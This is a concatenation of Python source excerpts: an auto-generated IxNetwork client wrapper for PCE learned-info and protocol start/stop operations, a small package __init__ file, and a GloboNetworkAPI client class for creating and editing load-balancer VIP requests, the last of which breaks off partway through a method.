NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('GetPceDetailedRsvpPccRequestedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedRsvpPccSyncLspLearnedInfo(self):
"""Executes the getPceDetailedRsvpPccSyncLspLearnedInfo operation on the server.
Gets Detailed Information about RSVP-TE PCC Sync/Report LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedRsvpPccSyncLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedRsvpPccSyncLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedRsvpPccSyncLspLearnedInfo operation on the server.
Gets Detailed Information about RSVP-TE PCC Sync/Report LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedRsvpPccSyncLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedRsvpPccSyncLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedRsvpPccSyncLspLearnedInfo operation on the server.
Gets Detailed Information about RSVP-TE PCC Sync/Report LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedRsvpPccSyncLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedRsvpPccSyncLspLearnedInfo(self, Arg2):
"""Executes the getPceDetailedRsvpPccSyncLspLearnedInfo operation on the server.
Gets Detailed Information about RSVP-TE PCC Sync/Report LSPs learnt by this PCE.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('GetPceDetailedRsvpPccSyncLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedRsvpPceInitiatedLspLearnedInfo(self):
"""Executes the getPceDetailedRsvpPceInitiatedLspLearnedInfo operation on the server.
Gets Detailed Information about RSVP-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedRsvpPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedRsvpPceInitiatedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedRsvpPceInitiatedLspLearnedInfo operation on the server.
Gets Detailed Information about RSVP-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedRsvpPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedRsvpPceInitiatedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedRsvpPceInitiatedLspLearnedInfo operation on the server.
Gets Detailed Information about RSVP-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedRsvpPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedRsvpPceInitiatedLspLearnedInfo(self, Arg2):
"""Executes the getPceDetailedRsvpPceInitiatedLspLearnedInfo operation on the server.
Gets Detailed Information about RSVP-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('GetPceDetailedRsvpPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedSrPccRequestedLspLearnedInfo(self):
"""Executes the getPceDetailedSrPccRequestedLspLearnedInfo operation on the server.
Gets Detailed Information about SR-TE PCC Requested LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedSrPccRequestedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedSrPccRequestedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedSrPccRequestedLspLearnedInfo operation on the server.
Gets Detailed Information about SR-TE PCC Requested LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedSrPccRequestedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedSrPccRequestedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedSrPccRequestedLspLearnedInfo operation on the server.
Gets Detailed Information about SR-TE PCC Requested LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedSrPccRequestedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedSrPccRequestedLspLearnedInfo(self, Arg2):
"""Executes the getPceDetailedSrPccRequestedLspLearnedInfo operation on the server.
Gets Detailed Information about SR-TE PCC Requested LSPs learnt by this PCE.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('GetPceDetailedSrPccRequestedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedSrPccSyncLspLearnedInfo(self):
"""Executes the getPceDetailedSrPccSyncLspLearnedInfo operation on the server.
Gets Detailed Information about SR-TE PCC Sync/Report LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedSrPccSyncLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedSrPccSyncLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedSrPccSyncLspLearnedInfo operation on the server.
Gets Detailed Information about SR-TE PCC Sync/Report LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedSrPccSyncLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedSrPccSyncLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedSrPccSyncLspLearnedInfo operation on the server.
Gets Detailed Information about SR-TE PCC Sync/Report LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedSrPccSyncLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedSrPccSyncLspLearnedInfo(self, Arg2):
"""Executes the getPceDetailedSrPccSyncLspLearnedInfo operation on the server.
Gets Detailed Information about SR-TE PCC Sync/Report LSPs learnt by this PCE.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('GetPceDetailedSrPccSyncLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedSrPceInitiatedLspLearnedInfo(self):
"""Executes the getPceDetailedSrPceInitiatedLspLearnedInfo operation on the server.
Gets Detailed Information about SR-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedSrPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedSrPceInitiatedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedSrPceInitiatedLspLearnedInfo operation on the server.
Gets Detailed Information about SR-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedSrPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedSrPceInitiatedLspLearnedInfo(self, SessionIndices):
"""Executes the getPceDetailedSrPceInitiatedLspLearnedInfo operation on the server.
Gets Detailed Information about SR-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('GetPceDetailedSrPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def GetPceDetailedSrPceInitiatedLspLearnedInfo(self, Arg2):
"""Executes the getPceDetailedSrPceInitiatedLspLearnedInfo operation on the server.
Gets Detailed Information about SR-TE PCE Initiated LSPs learnt by this PCE.
Args:
Arg1 (str(None|/api/v1/sessions/1/ixnetwork/topology)): The method internally sets Arg1 to the current href for this instance
Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
Returns:
list(str): ID to associate each async action invocation
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self.href
return self._execute('GetPceDetailedSrPceInitiatedLspLearnedInfo', payload=locals(), response_object=None)
def RestartDown(self):
"""Executes the restartDown operation on the server.
Stop and start interfaces and sessions that are in Down state.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('RestartDown', payload=locals(), response_object=None)
def RestartDown(self, SessionIndices):
"""Executes the restartDown operation on the server.
Stop and start interfaces and sessions that are in Down state.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('RestartDown', payload=locals(), response_object=None)
def RestartDown(self, SessionIndices):
"""Executes the restartDown operation on the server.
Stop and start interfaces and sessions that are in Down state.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('RestartDown', payload=locals(), response_object=None)
def Start(self):
"""Executes the start operation on the server.
Start selected protocols.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('Start', payload=locals(), response_object=None)
def Start(self, SessionIndices):
"""Executes the start operation on the server.
Start selected protocols.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('Start', payload=locals(), response_object=None)
def Start(self, SessionIndices):
"""Executes the start operation on the server.
Start selected protocols.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('Start', payload=locals(), response_object=None)
def Stop(self):
"""Executes the stop operation on the server.
Stop selected protocols.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('Stop', payload=locals(), response_object=None)
def Stop(self, SessionIndices):
"""Executes the stop operation on the server.
Stop selected protocols.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (list(number)): This parameter requires an array of session numbers 0 1 2 3
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('Stop', payload=locals(), response_object=None)
def Stop(self, SessionIndices):
"""Executes the stop operation on the server.
Stop selected protocols.
Args:
Arg1 (list(str[None|/api/v1/sessions/1/ixnetwork/topology])): The method internally sets Arg1 to the encapsulated list of hrefs for this instance
SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
Arg1 = self
return self._execute('Stop', payload=locals(), response_object=None)
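The Start/Stop overloads above accept SessionIndices either as a list of session numbers (0 1 2 3) or as a compact range string such as '1-4;6;7-12'. As a rough illustration of what that string form denotes (a hypothetical helper, not part of the IxNetwork client, which interprets the string server-side):

```python
def expand_session_indices(spec):
    """Expand a range string such as '1-4;6;7-12' into a sorted list of ints.

    Illustrative only: shows the session numbers a range string denotes.
    """
    indices = set()
    for part in spec.split(';'):
        if '-' in part:
            lo, hi = part.split('-')
            indices.update(range(int(lo), int(hi) + 1))
        else:
            indices.add(int(part))
    return sorted(indices)

print(expand_session_indices('1-4;6;7-12'))
# [1, 2, 3, 4, 6, 7, 8, 9, 10, 11, 12]
```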
# fc_messenger/__init__.py (repo fangqk1991/py-server, MIT License)
from .FCMessenger import FCMessenger
from .FCServer import FCServer
from .FCServer import FCRouter
# networkapiclient/Vip.py (repo Milstein/GloboNetworkAPI-client-python, Apache-2.0 License)
# -*- coding:utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from networkapiclient.GenericClient import GenericClient
from networkapiclient.exception import InvalidParameterError
from networkapiclient.utils import is_valid_int_param, get_list_map
from networkapiclient.Config import IP_VERSION
from networkapiclient.Pagination import Pagination
class Vip(GenericClient):
def __init__(self, networkapi_url, user, password, user_ldap=None):
"""Class constructor receives parameters to connect to the networkAPI.
:param networkapi_url: URL to access the network API.
:param user: User for authentication.
:param password: Password for authentication.
"""
super(Vip, self).__init__(networkapi_url, user, password, user_ldap)
def criar_requisicao(
self,
id_ip,
id_healthcheck_expect,
finalidade,
cliente,
ambiente,
cache,
metodo_bal,
persistencia,
healthcheck_type,
healthcheck,
timeout,
host,
maxcon,
dsr,
bal_ativo,
transbordos,
reals,
portas):
"""Inserts a new VIP request and returns its identifier.
:param id_ip: IP identifier.
:param id_healthcheck_expect: Healthcheck expect identifier.
:param finalidade: Finality.
:param cliente: Client.
:param ambiente: Environment.
:param cache: Cache.
:param metodo_bal: Balancing method.
:param persistencia: Persistence.
:param healthcheck_type: Healthcheck type.
:param healthcheck: Healthcheck.
:param timeout: Timeout.
:param host: Host.
:param maxcon: Maximum number of connections.
:param dsr: DSR.
:param bal_ativo: Active balancer.
:param transbordos: List of overflow server IPs. Ex: ['10.10.100.1','192.168.1.1'].
:param reals: List of reals. Ex: [{'real_name':'Teste1', 'real_ip':'10.10.10.1'},{'real_name':'Teste2', 'real_ip':'10.10.10.2'}]
:param portas: List of ports. Ex: ['80','8080','445'].
:return: Dictionary with the following structure:
::
{'requisicao_vip': {'id': < id_da_requisicao_vip >}}
:raise InvalidParameterError: IP identifier is null or invalid.
:raise InvalidParameterError: The value of finalidade, cliente, ambiente, cache, metodo_bal, persistencia,
healthcheck_type, healthcheck, timeout, host, maxcon, dsr, bal_ativo, transbordos, reals or portas is invalid.
:raise IpNaoExisteError: IP not registered.
:raise HealthCheckExpectNaoExisteError: Healthcheck_expect not registered.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to read the request XML or generate the response XML.
"""
vip_map = dict()
vip_map['id_ip'] = id_ip
vip_map['id_healthcheck_expect'] = id_healthcheck_expect
vip_map['finalidade'] = finalidade
vip_map['cliente'] = cliente
vip_map['ambiente'] = ambiente
vip_map['cache'] = cache
vip_map['maxcon'] = maxcon
vip_map['metodo_bal'] = metodo_bal
vip_map['persistencia'] = persistencia
vip_map['healthcheck_type'] = healthcheck_type
vip_map['healthcheck'] = healthcheck
vip_map['timeout'] = timeout
vip_map['host'] = host
vip_map['dsr'] = dsr
vip_map['bal_ativo'] = bal_ativo
vip_map['transbordos'] = {'transbordo': transbordos}
vip_map['reals'] = {'real': reals}
vip_map['portas_servicos'] = {'porta': portas}
code, xml = self.submit({'vip': vip_map}, 'POST', 'vip/')
return self.response(code, xml)
def add(
self,
id_ipv4,
id_ipv6,
id_healthcheck_expect,
finality,
client,
environment,
cache,
method_bal,
persistence,
healthcheck_type,
healthcheck,
timeout,
host,
maxcon,
areanegocio,
nome_servico,
l7_filter,
reals,
reals_prioritys,
reals_weights,
ports,
rule_id=''):
"""Inserts a new VIP request and returns its identifier.
:param id_ipv4: Identifier of the IPv4. Integer value and greater than zero.
:param id_ipv6: Identifier of the IPv6. Integer value and greater than zero.
:param id_healthcheck_expect: Identifier of the expected result. (Only if healthcheck_type is HTTP)
:param finality: finality.
:param client: client.
:param environment: environment.
:param cache: cache.
:param method_bal: method_bal.
:param persistence: persistence.
:param healthcheck_type: healthcheck_type.
:param healthcheck: The URL to be checked. (Only if healthcheck_type is HTTP)
:param timeout: Timeout. Integer value and greater than zero.
:param host: Host.
:param maxcon: Maximum number of connections. Integer value and greater than zero.
:param areanegocio: area of business.
:param nome_servico: service name.
:param l7_filter: l7_filter.
:param reals: List of reals. Ex: [{'real_name':'Teste1', 'real_ip':'10.10.10.1'},{'real_name':'Teste2', 'real_ip':'10.10.10.2'}]
:param reals_prioritys: List of reals_priority. Ex: ['1','5','3'].
:param reals_weights: List of reals_weight. Ex: ['1','5','3'].
:param ports: List of ports. Ex: ['80:80','8080:80','25:445'].
:param rule_id: rule id.
:return: Dictionary with the following structure:
::
{'requisicao_vip': {'id': < id_da_requisicao_vip >}}
:raise InvalidParameterError: IP identifier is null or invalid.
:raise InvalidParameterError: The value of finality, client, environment, cache, method_bal, persistence,
healthcheck_type, healthcheck, timeout, host, maxcon, dsr, reals, reals_prioritys, reals_weights or ports is invalid.
:raise IpNaoExisteError: IP not registered.
:raise EnvironmentVipNotFoundError: Environment Vip with values finality, client and environment not registered.
:raise VipError: Real name and Real Ip not associated.
:raise HealthCheckExpectNaoExisteError: Healthcheck_expect not registered.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
vip_map = dict()
vip_map['id_ipv4'] = id_ipv4
vip_map['id_ipv6'] = id_ipv6
vip_map['id_healthcheck_expect'] = id_healthcheck_expect
vip_map['finalidade'] = finality
vip_map['cliente'] = client
vip_map['ambiente'] = environment
vip_map['cache'] = cache
vip_map['maxcon'] = maxcon
vip_map['metodo_bal'] = method_bal
vip_map['persistencia'] = persistence
vip_map['healthcheck_type'] = healthcheck_type
vip_map['healthcheck'] = healthcheck
vip_map['timeout'] = timeout
vip_map['host'] = host
vip_map['areanegocio'] = areanegocio
vip_map['nome_servico'] = nome_servico
vip_map['l7_filter'] = l7_filter
vip_map['reals'] = {'real': reals}
vip_map['reals_prioritys'] = {'reals_priority': reals_prioritys}
vip_map['reals_weights'] = {'reals_weight': reals_weights}
vip_map['portas_servicos'] = {'porta': ports}
vip_map['rule_id'] = rule_id
code, xml = self.submit({'vip': vip_map}, 'POST', 'requestvip/')
return self.response(code, xml)
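Before submission, add() wraps each list parameter in a dict keyed by its singular element name, which is how the XML encoder expects repeated elements. A minimal sketch of that packing step (a standalone helper for illustration, not part of the client API):

```python
# Sketch of how add() packs its list arguments for the XML encoder;
# the key names mirror the vip_map assignments in add().
def pack_vip_lists(reals, reals_prioritys, reals_weights, ports):
    return {
        'reals': {'real': reals},
        'reals_prioritys': {'reals_priority': reals_prioritys},
        'reals_weights': {'reals_weight': reals_weights},
        'portas_servicos': {'porta': ports},
    }

payload = pack_vip_lists(
    [{'real_name': 'Teste1', 'real_ip': '10.10.10.1'}],
    ['1'], ['5'], ['80:80'],
)
```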
def alter(
self,
id_vip,
id_ipv4,
id_ipv6,
id_healthcheck_expect,
validated,
vip_created,
finality,
client,
environment,
cache,
method_bal,
persistence,
healthcheck_type,
healthcheck,
timeout,
host,
maxcon,
areanegocio,
nome_servico,
l7_filter,
reals,
reals_prioritys,
reals_weights,
ports,
rule_id=''):
"""Changes a VIP request by its identifier.
:param id_vip: Identifier of the VIP. Integer value and greater than zero.
:param id_ipv4: Identifier of the IPv4. Integer value and greater than zero.
:param id_ipv6: Identifier of the IPv6. Integer value and greater than zero.
:param id_healthcheck_expect: Identifier of the expected result. (Only if healthcheck_type is HTTP)
:param validated: Indication of VIP Validated. 0 or 1
:param vip_created: Indication Vip created. 0 or 1
:param finality: finality.
:param client: client.
:param environment: environment.
:param cache: cache.
:param method_bal: method_bal.
:param persistence: persistence.
:param healthcheck_type: healthcheck_type.
:param healthcheck: The URL to be checked. (Only if healthcheck_type is HTTP)
:param timeout: Timeout. Integer value and greater than zero.
:param host: Host.
:param maxcon: Maximum number of connections. Integer value and greater than zero.
:param areanegocio: area of business.
:param nome_servico: service name.
:param l7_filter: l7_filter.
:param reals: List of reals. Ex: [{'real_name':'Teste1', 'real_ip':'10.10.10.1'},{'real_name':'Teste2', 'real_ip':'10.10.10.2'}]
:param reals_prioritys: List of reals_priority. Ex: ['1','5','3'].
:param reals_weights: List of reals_weight. Ex: ['1','5','3'].
:param ports: List of ports. Ex: ['80:80','8080:80','25:445'].
:param rule_id: rule id.
:return: None
:raise InvalidParameterError: IP identifier is null or invalid.
:raise InvalidParameterError: The value of finality, client, environment, cache, method_bal, persistence,
healthcheck_type, healthcheck, timeout, host, maxcon, dsr, reals, reals_prioritys, reals_weights or ports is invalid.
:raise IpNaoExisteError: IP not registered.
:raise VipError: VipError
:raise VipNaoExisteError: Request VIP not registered.
:raise HealthCheckExpectNaoExisteError: Healthcheck_expect not registered.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'The identifier of vip is invalid or was not informed.')
vip_map = dict()
vip_map['id_ipv4'] = id_ipv4
vip_map['id_ipv6'] = id_ipv6
vip_map['id_healthcheck_expect'] = id_healthcheck_expect
vip_map['validado'] = validated
vip_map['vip_criado'] = vip_created
vip_map['finalidade'] = finality
vip_map['cliente'] = client
vip_map['ambiente'] = environment
vip_map['cache'] = cache
vip_map['maxcon'] = maxcon
vip_map['metodo_bal'] = method_bal
vip_map['persistencia'] = persistence
vip_map['healthcheck_type'] = healthcheck_type
vip_map['healthcheck'] = healthcheck
vip_map['timeout'] = timeout
vip_map['host'] = host
vip_map['areanegocio'] = areanegocio
vip_map['nome_servico'] = nome_servico
vip_map['l7_filter'] = l7_filter
vip_map['reals'] = {'real': reals}
vip_map['reals_prioritys'] = {'reals_priority': reals_prioritys}
vip_map['reals_weights'] = {'reals_weight': reals_weights}
vip_map['portas_servicos'] = {'porta': ports}
vip_map['rule_id'] = rule_id
url = 'requestvip/' + str(id_vip) + '/'
code, xml = self.submit({'vip': vip_map}, 'PUT', url)
return self.response(code, xml)
def edit_reals(
self,
id_vip,
method_bal,
reals,
reals_prioritys,
reals_weights,
alter_priority=0):
"""Execute the script 'gerador_vips' several times with options -real, -add and -del to adjust vip request reals.
:param id_vip: Identifier of the VIP. Integer value and greater than zero.
:param method_bal: method_bal.
:param reals: List of reals. Ex: [{'real_name':'Teste1', 'real_ip':'10.10.10.1'},{'real_name':'Teste2', 'real_ip':'10.10.10.2'}]
:param reals_prioritys: List of reals_priority. Ex: ['1','5','3'].
:param reals_weights: List of reals_weight. Ex: ['1','5','3'].
:param alter_priority: 1 if the priority has changed, 0 if it has not.
:return: None
:raise VipNaoExisteError: Request VIP not registered.
:raise InvalidParameterError: Identifier of the VIP request is invalid or null.
:raise DataBaseError: Networkapi failed to access the database.
:raise XMLError: Networkapi failed to generate the XML response.
:raise EnvironmentVipError: The combination of finality, client and environment is invalid.
:raise InvalidTimeoutValueError: The value of timeout is invalid.
:raise InvalidBalMethodValueError: The value of method_bal is invalid.
:raise InvalidCacheValueError: The value of cache is invalid.
:raise InvalidPersistenceValueError: The value of persistence is invalid.
:raise InvalidPriorityValueError: One of the priority values is invalid.
:raise EquipamentoNaoExisteError: The equipment associated with this Vip Request doesn't exist.
:raise IpEquipmentError: Association between equipment and ip of this Vip Request doesn't exist.
:raise IpError: IP not registered.
:raise RealServerPriorityError: Vip Request priority list has an error.
:raise RealServerWeightError: Vip Request weight list has an error.
:raise RealServerPortError: Vip Request port list has an error.
:raise RealParameterValueError: Vip Request real server parameter list has an error.
:raise RealServerScriptError: Vip Request real server script execution error.
"""
if not is_valid_int_param(id_vip):
raise InvalidParameterError(
u'The identifier of vip is invalid or was not informed.')
vip_map = dict()
vip_map['vip_id'] = id_vip
# vip_map['metodo_bal'] = method_bal
vip_map['reals'] = {'real': reals}
vip_map['reals_prioritys'] = {'reals_priority': reals_prioritys}
vip_map['reals_weights'] = {'reals_weight': reals_weights}
vip_map['alter_priority'] = alter_priority
url = 'vip/real/edit/'
code, xml = self.submit({'vip': vip_map}, 'PUT', url)
return self.response(code, xml)
def adicionar_real(
self,
vip_id,
ip_id,
equip_id,
port_vip=None,
port_real=None):
"""Execute the script 'gerador_vips' with option -add.
:param vip_id: Identifier of the Request VIP. Integer value greater than zero.
:param ip_id: Identifier of the IP. Integer value greater than zero.
:param equip_id: Identifier of the Equipment. Integer value greater than zero.
:param port_vip: Port Vip. Integer value between 1 and 65535.
